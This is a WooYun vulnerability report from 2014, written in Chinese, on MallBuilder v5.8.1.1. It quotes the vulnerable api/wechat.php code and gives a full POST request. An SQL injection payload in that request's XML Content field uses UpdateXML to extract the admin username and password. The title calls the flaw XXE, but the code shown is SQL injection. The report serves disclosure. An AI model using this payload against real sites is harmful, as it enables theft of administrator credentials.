当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081144

漏洞标题:mallbuilder多用户商城系统XXE注入可以爆管理员用户密码

相关厂商:shop-builder.cn

漏洞作者: nextdoor

提交时间:2014-10-29 12:52

修复时间:2014-12-30 14:44

公开时间:2014-12-30 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-29: 细节已通知厂商并且等待厂商处理中
2014-11-03: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-12-28: 细节向核心白帽子及相关领域专家公开
2015-01-07: 细节向普通白帽子公开
2015-01-17: 细节向实习白帽子公开
2014-12-30: 细节向公众公开

简要描述:

mallbuilder多用户商城系统XXE注入

详细说明:

系统 MallBuilder_v5.8.1.1
api/wechat.php中

<?php
include_once("../includes/global.php");
@include_once("../config/wechat_config.php");
$wechat=$wechat_config['wechat']?$wechat_config['wechat']:"";
define("TOKEN", $wechat);
$wechatObj = new wechatCallbackapiTest();
if($_GET["echostr"]&&$_GET["signature"]&&$_GET["timestamp"]&&$_GET["nonce"])
//if后的get值不存在进入else语句
{  	
	$wechatObj->valid();	
}
else
{    
	$wechatObj->responseMsg(); //跟踪responseMsg()函数
}
class wechatCallbackapiTest
{
	public function valid()
    {
        $echoStr = $_GET["echostr"];
        if($this->checkSignature()){
			echo $echoStr;
        	exit;
        }
    }
    public function responseMsg()
    {  
		$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
		global $db,$config;
		if (!empty($postStr)){
			    
              	$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
              	
                $fromUsername = $postObj->FromUserName;
                $toUsername = $postObj->ToUserName;    
                $keyword = trim($postObj->Content);
                $time = time();
				$RX_TYPE = trim($postObj->MsgType);
				$num=0;
				
				$str="";
				
				if($RX_TYPE=='text')//是POST的MsgType为text
				{  
				
					if(!empty($keyword))	//在xml数据中定义Content变量
					{
					
						$sql="select pname,id,pic from ".PRO." where pname like '%$keyword%' order by id desc limit 0,4"; //Content 进入sql语句,可以注入
						$db->query($sql);
						$re=$db->getRows();
						foreach($re as $val)
						{
							$str.="<item>
								 <Title><![CDATA[".$val['pname']."]]></Title> 
								 <Description><![CDATA[]]></Description>
								 <PicUrl><![CDATA[".$val['pic']."]]></PicUrl>
								 <Url><![CDATA[".$config['weburl']."?m=product&s=detail&id=".$val['id']."]]></Url>
							</item>";
							$num++;
							echo "test2";
						}
						if($num>0)
						{
							$textTpl = "<xml>
							<ToUserName><![CDATA[%s]]></ToUserName>
							<FromUserName><![CDATA[%s]]></FromUserName>
							<CreateTime>%s</CreateTime>
							<MsgType><![CDATA[news]]></MsgType>
							<ArticleCount>".$num."</ArticleCount>
							<Articles>".$str."</Articles>
							<FuncFlag>1</FuncFlag>
							</xml>"; 
							$msgType = "text";
							$contentStr = "";
							$resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr);
							echo $resultStr;
							
						}
					}
					else
						echo "Input something1 ";
				}
				else{
                	echo "Input something2 ";
                }
        }else{
        	echo "";
        	echo "test6";
        	exit;
        }
    }
	private function checkSignature()
	{
        $signature = $_GET["signature"];
        $timestamp = $_GET["timestamp"];
        $nonce = $_GET["nonce"];	
        		
		$token = TOKEN;
		$tmpArr = array($token, $timestamp, $nonce);
		sort($tmpArr);
		$tmpStr = implode( $tmpArr );
		$tmpStr = sha1( $tmpStr );
		
		if( $tmpStr == $signature ){
			return true;
		}else{
			return false;
		}
	}
}
?>


POST 提交的代码

POST /mallbuilder/api/wechat.php HTTP/1.1
Host: 127.0.0.1:8088
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=fdb687e31fb1d9a23b1b5dc3221123f9
<xml>							
<ToUserName>test1</ToUserName>							
<FromUserName>test3</FromUserName>						
<CreateTime>123456</CreateTime>
<MsgType>text</MsgType>							
<ArticleCount>11</ArticleCount>
<Articles>aaa</Articles>
<FuncFlag>0</FuncFlag>
<Content>test' and UpdateXML(1,CONCAT(0x5b,mid((SELECT (select concat(user,0x23,password) from mallbuilder_admin limit 1)),1,32),0x5d),1)#</Content>
</xml>

漏洞证明:

mall1.PNG

mall2.PNG


官网demo演示

mall3.PNG

修复方案:

版权声明:转载请注明来源 nextdoor@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-30 14:44

厂商回复:

最新状态:

暂无